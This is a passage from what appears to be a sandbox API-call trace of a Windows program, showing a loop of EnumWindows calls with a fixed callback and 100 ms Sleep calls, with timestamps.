EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.418] Sleep (dwMilliseconds=0x64) [0307.457] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.457] Sleep (dwMilliseconds=0x64) [0307.471] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.471] Sleep (dwMilliseconds=0x64) [0307.497] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.498] Sleep (dwMilliseconds=0x64) [0307.538] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.539] Sleep (dwMilliseconds=0x64) [0307.577] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.578] Sleep (dwMilliseconds=0x64) [0307.579] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.580] Sleep (dwMilliseconds=0x64) [0307.615] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.616] Sleep (dwMilliseconds=0x64) [0307.654] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.654] Sleep (dwMilliseconds=0x64) [0307.681] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.681] Sleep (dwMilliseconds=0x64) [0307.692] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.693] Sleep (dwMilliseconds=0x64) [0307.732] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.780] Sleep (dwMilliseconds=0x64) [0307.818] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.819] Sleep (dwMilliseconds=0x64) [0307.856] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.857] Sleep (dwMilliseconds=0x64) [0307.885] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.886] Sleep (dwMilliseconds=0x64) [0307.897] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.898] Sleep (dwMilliseconds=0x64) [0307.935] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.936] Sleep (dwMilliseconds=0x64) [0307.973] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.974] Sleep (dwMilliseconds=0x64) [0308.049] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0308.049] Sleep (dwMilliseconds=0x64) [0308.140] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0308.140] Sleep (dwMilliseconds=0x64) [0308.179] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0308.180] Sleep (dwMilliseconds=0x64) [0308.235] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0308.235] Sleep (dwMilliseconds=0x64) [0308.248] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0308.249] Sleep (dwMilliseconds=0x64) [0308.277] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0308.277] Sleep (dwMilliseconds=0x64) [0308.314] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0308.314] Sleep (dwMilliseconds=0x64) [0308.352] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0308.352] Sleep (dwMilliseconds=0x64) [0308.356] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0308.356] Sleep (dwMilliseconds=0x64) [0309.079] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.080] Sleep (dwMilliseconds=0x64) [0309.137] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.138] Sleep (dwMilliseconds=0x64) [0309.189] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.190] Sleep (dwMilliseconds=0x64) [0309.220] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.221] Sleep (dwMilliseconds=0x64) [0309.302] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.302] Sleep (dwMilliseconds=0x64) [0309.340] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.341] Sleep (dwMilliseconds=0x64) [0309.346] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.346] Sleep (dwMilliseconds=0x64) [0309.377] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.378] Sleep (dwMilliseconds=0x64) [0309.415] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.415] Sleep (dwMilliseconds=0x64) [0309.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.428] Sleep (dwMilliseconds=0x64) [0309.452] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.452] Sleep (dwMilliseconds=0x64) [0309.488] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.489] Sleep (dwMilliseconds=0x64) [0309.508] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.508] Sleep (dwMilliseconds=0x64) [0309.528] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.529] Sleep (dwMilliseconds=0x64) [0309.566] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.566] Sleep (dwMilliseconds=0x64) [0309.603] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.603] Sleep (dwMilliseconds=0x64) [0309.605] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.605] Sleep (dwMilliseconds=0x64) [0309.640] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.641] Sleep (dwMilliseconds=0x64) [0309.677] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.678] Sleep (dwMilliseconds=0x64) [0309.685] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.685] Sleep (dwMilliseconds=0x64) [0309.719] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.720] Sleep (dwMilliseconds=0x64) [0309.757] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.758] Sleep (dwMilliseconds=0x64) [0309.817] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.817] Sleep (dwMilliseconds=0x64) [0309.822] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.822] Sleep (dwMilliseconds=0x64) [0309.857] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.858] Sleep (dwMilliseconds=0x64) [0309.894] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.895] Sleep (dwMilliseconds=0x64) [0309.923] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.923] Sleep (dwMilliseconds=0x64) [0309.941] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.941] Sleep (dwMilliseconds=0x64) [0309.977] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0309.977] Sleep (dwMilliseconds=0x64) [0310.014] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.015] Sleep (dwMilliseconds=0x64) [0310.016] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.017] Sleep (dwMilliseconds=0x64) [0310.053] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.053] Sleep (dwMilliseconds=0x64) [0310.099] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.102] Sleep (dwMilliseconds=0x64) [0310.184] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.184] Sleep (dwMilliseconds=0x64) [0310.285] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.288] Sleep (dwMilliseconds=0x64) [0310.324] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.326] Sleep (dwMilliseconds=0x64) [0310.329] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.330] Sleep (dwMilliseconds=0x64) [0310.370] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.371] Sleep (dwMilliseconds=0x64) [0310.406] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.407] Sleep (dwMilliseconds=0x64) [0310.494] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.495] Sleep (dwMilliseconds=0x64) [0310.500] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.500] Sleep (dwMilliseconds=0x64) [0310.544] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.545] Sleep (dwMilliseconds=0x64) [0310.581] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.581] Sleep (dwMilliseconds=0x64) [0310.613] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.614] Sleep (dwMilliseconds=0x64) [0310.621] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.621] Sleep (dwMilliseconds=0x64) [0310.669] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.670] Sleep (dwMilliseconds=0x64) [0310.708] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.709] Sleep (dwMilliseconds=0x64) [0310.738] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.739] Sleep (dwMilliseconds=0x64) [0310.751] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.751] Sleep (dwMilliseconds=0x64) [0310.823] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.824] Sleep (dwMilliseconds=0x64) [0310.878] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.879] Sleep (dwMilliseconds=0x64) [0310.898] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.898] Sleep (dwMilliseconds=0x64) [0310.918] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.919] Sleep (dwMilliseconds=0x64) [0310.960] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0310.960] Sleep (dwMilliseconds=0x64) [0311.000] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.000] Sleep (dwMilliseconds=0x64) [0311.015] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.016] Sleep (dwMilliseconds=0x64) [0311.046] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.047] Sleep (dwMilliseconds=0x64) [0311.103] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.104] Sleep (dwMilliseconds=0x64) [0311.162] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.163] Sleep (dwMilliseconds=0x64) [0311.199] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.199] Sleep (dwMilliseconds=0x64) [0311.238] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.238] Sleep (dwMilliseconds=0x64) [0311.274] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.274] Sleep (dwMilliseconds=0x64) [0311.277] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.277] Sleep (dwMilliseconds=0x64) [0311.315] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.315] Sleep (dwMilliseconds=0x64) [0311.371] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.373] Sleep (dwMilliseconds=0x64) [0311.387] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.388] Sleep (dwMilliseconds=0x64) [0311.416] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.416] Sleep (dwMilliseconds=0x64) [0311.452] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.453] Sleep (dwMilliseconds=0x64) [0311.497] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.498] Sleep (dwMilliseconds=0x64) [0311.523] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.524] Sleep (dwMilliseconds=0x64) [0311.563] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.563] Sleep (dwMilliseconds=0x64) [0311.600] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.601] Sleep (dwMilliseconds=0x64) [0311.678] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.678] Sleep (dwMilliseconds=0x64) [0311.686] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.686] Sleep (dwMilliseconds=0x64) [0311.723] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.723] Sleep (dwMilliseconds=0x64) [0311.760] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.760] Sleep (dwMilliseconds=0x64) [0311.863] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.863] Sleep (dwMilliseconds=0x64) [0311.873] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.874] Sleep (dwMilliseconds=0x64) [0311.912] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.913] Sleep (dwMilliseconds=0x64) [0311.952] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.953] Sleep (dwMilliseconds=0x64) [0311.972] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.972] Sleep (dwMilliseconds=0x64) [0311.997] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0311.997] Sleep (dwMilliseconds=0x64) [0312.047] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.050] Sleep (dwMilliseconds=0x64) [0312.113] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.114] Sleep (dwMilliseconds=0x64) [0312.133] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.134] Sleep (dwMilliseconds=0x64) [0312.166] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.166] Sleep (dwMilliseconds=0x64) [0312.205] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.206] Sleep (dwMilliseconds=0x64) [0312.245] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.246] Sleep (dwMilliseconds=0x64) [0312.253] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.253] Sleep (dwMilliseconds=0x64) [0312.289] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.290] Sleep (dwMilliseconds=0x64) [0312.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.333] Sleep (dwMilliseconds=0x64) [0312.375] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.376] Sleep (dwMilliseconds=0x64) [0312.383] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.384] Sleep (dwMilliseconds=0x64) [0312.420] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.421] Sleep (dwMilliseconds=0x64) [0312.458] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.458] Sleep (dwMilliseconds=0x64) [0312.478] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.478] Sleep (dwMilliseconds=0x64) [0312.498] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.499] Sleep (dwMilliseconds=0x64) [0312.538] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.538] Sleep (dwMilliseconds=0x64) [0312.577] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.578] Sleep (dwMilliseconds=0x64) [0312.582] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.583] Sleep (dwMilliseconds=0x64) [0312.627] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.628] Sleep (dwMilliseconds=0x64) [0312.667] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.667] Sleep (dwMilliseconds=0x64) [0312.706] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.707] Sleep (dwMilliseconds=0x64) [0312.735] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.735] Sleep (dwMilliseconds=0x64) [0312.771] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.772] Sleep (dwMilliseconds=0x64) [0312.966] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0312.967] Sleep (dwMilliseconds=0x64) [0313.006] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.007] Sleep (dwMilliseconds=0x64) [0313.015] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.016] Sleep (dwMilliseconds=0x64) [0313.078] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.078] Sleep (dwMilliseconds=0x64) [0313.121] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.122] Sleep (dwMilliseconds=0x64) [0313.150] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.151] Sleep (dwMilliseconds=0x64) [0313.155] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.155] Sleep (dwMilliseconds=0x64) [0313.172] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.172] Sleep (dwMilliseconds=0x64) [0313.211] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.212] Sleep (dwMilliseconds=0x64) [0313.264] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.264] Sleep (dwMilliseconds=0x64) [0313.280] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.281] Sleep (dwMilliseconds=0x64) [0313.303] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.304] Sleep (dwMilliseconds=0x64) [0313.365] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.365] Sleep (dwMilliseconds=0x64) [0313.381] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.382] Sleep (dwMilliseconds=0x64) [0313.419] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.420] Sleep (dwMilliseconds=0x64) [0313.455] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.456] Sleep (dwMilliseconds=0x64) [0313.459] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.459] Sleep (dwMilliseconds=0x64) [0313.495] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.496] Sleep (dwMilliseconds=0x64) [0313.532] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.533] Sleep (dwMilliseconds=0x64) [0313.551] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.553] Sleep (dwMilliseconds=0x64) [0313.583] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.584] Sleep (dwMilliseconds=0x64) [0313.623] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.624] Sleep (dwMilliseconds=0x64) [0313.663] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.664] Sleep (dwMilliseconds=0x64) [0313.671] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.672] Sleep (dwMilliseconds=0x64) [0313.701] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.702] Sleep (dwMilliseconds=0x64) [0313.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.741] Sleep (dwMilliseconds=0x64) [0313.780] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.781] Sleep (dwMilliseconds=0x64) [0313.783] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.784] Sleep (dwMilliseconds=0x64) [0313.859] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.860] Sleep (dwMilliseconds=0x64) [0313.900] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.901] Sleep (dwMilliseconds=0x64) [0313.934] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.935] Sleep (dwMilliseconds=0x64) [0313.941] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0313.941] Sleep (dwMilliseconds=0x64) [0313.991] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.027] Sleep (dwMilliseconds=0x64) [0314.081] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.082] Sleep (dwMilliseconds=0x64) [0314.100] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.100] Sleep (dwMilliseconds=0x64) [0314.122] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.123] Sleep (dwMilliseconds=0x64) [0314.168] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.169] Sleep (dwMilliseconds=0x64) [0314.209] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.210] Sleep (dwMilliseconds=0x64) [0314.218] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.219] Sleep (dwMilliseconds=0x64) [0314.248] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.249] Sleep (dwMilliseconds=0x64) [0314.289] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.290] Sleep (dwMilliseconds=0x64) [0314.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.333] Sleep (dwMilliseconds=0x64) [0314.339] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.340] Sleep (dwMilliseconds=0x64) [0314.378] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.379] Sleep (dwMilliseconds=0x64) [0314.421] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.423] Sleep (dwMilliseconds=0x64) [0314.448] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.449] Sleep (dwMilliseconds=0x64) [0314.461] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.461] Sleep (dwMilliseconds=0x64) [0314.505] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.505] Sleep (dwMilliseconds=0x64) [0314.547] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.548] Sleep (dwMilliseconds=0x64) [0314.563] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.564] Sleep (dwMilliseconds=0x64) [0314.595] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.595] Sleep (dwMilliseconds=0x64) [0314.633] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.633] Sleep (dwMilliseconds=0x64) [0314.669] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.670] Sleep (dwMilliseconds=0x64) [0314.672] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.673] Sleep (dwMilliseconds=0x64) [0314.708] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.709] Sleep (dwMilliseconds=0x64) [0314.749] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.749] Sleep (dwMilliseconds=0x64) [0314.787] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.834] Sleep (dwMilliseconds=0x64) [0314.837] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.837] Sleep (dwMilliseconds=0x64) [0314.876] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.877] Sleep (dwMilliseconds=0x64) [0314.926] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.928] Sleep (dwMilliseconds=0x64) [0314.969] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.970] Sleep (dwMilliseconds=0x64) [0314.974] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0314.975] Sleep (dwMilliseconds=0x64) [0315.048] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.049] Sleep (dwMilliseconds=0x64) [0315.114] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.115] Sleep (dwMilliseconds=0x64) [0315.170] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.170] Sleep (dwMilliseconds=0x64) [0315.176] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.176] Sleep (dwMilliseconds=0x64) [0315.277] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.278] Sleep (dwMilliseconds=0x64) [0315.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.428] Sleep (dwMilliseconds=0x64) [0315.455] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.455] Sleep (dwMilliseconds=0x64) [0315.468] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.469] Sleep (dwMilliseconds=0x64) [0315.505] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.505] Sleep (dwMilliseconds=0x64) [0315.540] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.541] Sleep (dwMilliseconds=0x64) [0315.545] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.546] Sleep (dwMilliseconds=0x64) [0315.589] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.591] Sleep (dwMilliseconds=0x64) [0315.634] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.635] Sleep (dwMilliseconds=0x64) [0315.643] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.643] Sleep (dwMilliseconds=0x64) [0315.673] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.674] Sleep (dwMilliseconds=0x64) [0315.712] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.713] Sleep (dwMilliseconds=0x64) [0315.741] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.742] Sleep (dwMilliseconds=0x64) [0315.753] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.754] Sleep (dwMilliseconds=0x64) [0315.843] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.844] Sleep (dwMilliseconds=0x64) [0315.880] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.881] Sleep (dwMilliseconds=0x64) [0315.887] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.888] Sleep (dwMilliseconds=0x64) [0315.928] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.934] Sleep (dwMilliseconds=0x64) [0315.977] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.978] Sleep (dwMilliseconds=0x64) [0315.990] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0315.991] Sleep (dwMilliseconds=0x64) [0316.020] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.021] Sleep (dwMilliseconds=0x64) [0316.071] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.072] Sleep (dwMilliseconds=0x64) [0316.102] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.102] Sleep (dwMilliseconds=0x64) [0316.112] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.112] Sleep (dwMilliseconds=0x64) [0316.217] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.218] Sleep (dwMilliseconds=0x64) [0316.263] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.264] Sleep (dwMilliseconds=0x64) [0316.265] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.266] Sleep (dwMilliseconds=0x64) [0316.307] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.308] Sleep (dwMilliseconds=0x64) [0316.350] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.351] Sleep (dwMilliseconds=0x64) [0316.430] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.430] Sleep (dwMilliseconds=0x64) [0316.479] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.480] Sleep (dwMilliseconds=0x64) [0316.553] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.554] Sleep (dwMilliseconds=0x64) [0316.634] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.635] Sleep (dwMilliseconds=0x64) [0316.655] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.656] Sleep (dwMilliseconds=0x64) [0316.679] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.679] Sleep (dwMilliseconds=0x64) [0316.718] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.719] Sleep (dwMilliseconds=0x64) [0316.761] EnumWindows 